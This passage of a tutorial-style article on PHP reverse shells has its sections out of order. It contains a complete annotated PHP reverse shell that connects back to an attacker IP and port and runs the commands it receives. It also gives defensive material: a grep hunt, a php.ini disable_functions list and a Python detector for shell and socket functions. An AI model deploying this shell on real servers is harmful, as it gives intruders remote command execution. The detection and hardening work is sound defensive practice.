grep -R "fsockopen\|exec\|system\|shell_exec\|popen\|proc_open" /var/www/html/
Here is a simplified, annotated version. The most famous public example is the php-reverse-shell.php from PentestMonkey (now maintained in the laudanum project).
<?php
// Set the attacker's IP address and listening port
$ip = '192.168.1.100'; // CHANGE THIS
$port = 4444; // CHANGE THIS

// Create a TCP socket
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    // Failed to connect
    echo "Error: $errstr ($errno)";
    exit(1);
}

// Redirect STDIN, STDOUT, STDERR to our socket
// This allows the shell to read input from the attacker and send output back
fwrite($sock, "Connected! Type commands:\n");
while (!feof($sock)) {
    // Send a prompt
    fwrite($sock, "shell> ");

    // Read command from attacker
    $cmd = fgets($sock, 1024);
    if (trim($cmd) == "exit") break;
    // Execute command and capture output
    $output = shell_exec($cmd . " 2>&1"); // 2>&1 includes stderr
    // Send output back to attacker
    fwrite($sock, $output);
}

fclose($sock);
?>
Edit php.ini:
disable_functions = exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec, fsockopen, pfsockopen, socket_create, stream_socket_client
Caveat: This breaks some legitimate apps (e.g., certain WordPress backup plugins).
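A tighter version of the grep search and the disable_functions check above, as an added example (not code from the original article or from any project it names). It matches call sites only, so identifiers such as curl_exec or $pdo->exec do not trigger, and it rates a file higher when a socket opener and a command runner appear together; the names EXEC_FUNCS, NET_FUNCS, classify, scan_webroot and missing_disabled are chosen for this example.

```python
import re
from pathlib import Path

# Function names taken from the grep pattern and the disable_functions line on this page.
EXEC_FUNCS = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open", "pcntl_exec"}
NET_FUNCS = {"fsockopen", "pfsockopen", "socket_create", "stream_socket_client"}
# A call site is the bare name followed by "(". The lookbehind skips method calls
# (->exec), static calls (::exec), $variables and longer identifiers (curl_exec).
CALL_RE = re.compile(r"(?<![\w$>:])(" + "|".join(sorted(EXEC_FUNCS | NET_FUNCS)) + r")\s*\(", re.I)


def called_functions(php_source: str) -> set[str]:
    """Return the watched functions that appear as call sites in the source."""
    return {m.group(1).lower() for m in CALL_RE.finditer(php_source)}


def classify(php_source: str) -> str:
    """'high' when a socket opener and a command runner co-occur, 'review' for either alone."""
    found = called_functions(php_source)
    if found & EXEC_FUNCS and found & NET_FUNCS:
        return "high"
    return "review" if found else "clean"


def scan_webroot(root: str) -> dict[str, str]:
    """Classify every .php file under root and return only the non-clean ones."""
    results = {}
    for path in Path(root).rglob("*.php"):
        verdict = classify(path.read_text(errors="replace"))
        if verdict != "clean":
            results[str(path)] = verdict
    return results


def missing_disabled(php_ini_text: str) -> set[str]:
    """Watched functions that the disable_functions directive does not cover."""
    disabled: set[str] = set()
    for line in php_ini_text.splitlines():
        line = line.split(";", 1)[0]  # drop php.ini comments
        m = re.match(r"\s*disable_functions\s*=\s*(.*)", line, re.I)
        if m:  # a later directive overrides an earlier one
            disabled = {f.strip().lower() for f in m.group(1).strip('" ').split(",") if f.strip()}
    return (EXEC_FUNCS | NET_FUNCS) - disabled


if __name__ == "__main__":
    for path, verdict in sorted(scan_webroot("/var/www/html").items()):
        print(f"{verdict:6} {path}")
```

A match is a triage signal for manual review; scripts that build function names dynamically will not match, so this complements the disable_functions setting and does not replace it.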
In the world of cybersecurity, the term "shell" refers to a user interface that allows access to an operating system’s services. When that shell is established from a target machine back to an attacker’s machine, bypassing standard firewall rules, it is called a Reverse Shell.
When the target server runs PHP (a language powering over 75% of the web, including platforms like WordPress, Joomla, and Laravel), the PHP Reverse Shell becomes a weapon of choice for penetration testers and, unfortunately, malicious actors.
This article serves as a technical deep dive. We will explore what a PHP reverse shell is, how it works, a breakdown of a classic script, advanced obfuscation techniques, and—most critically—how defenders can detect and prevent these attacks.
To understand a reverse shell, you must first understand a bind shell.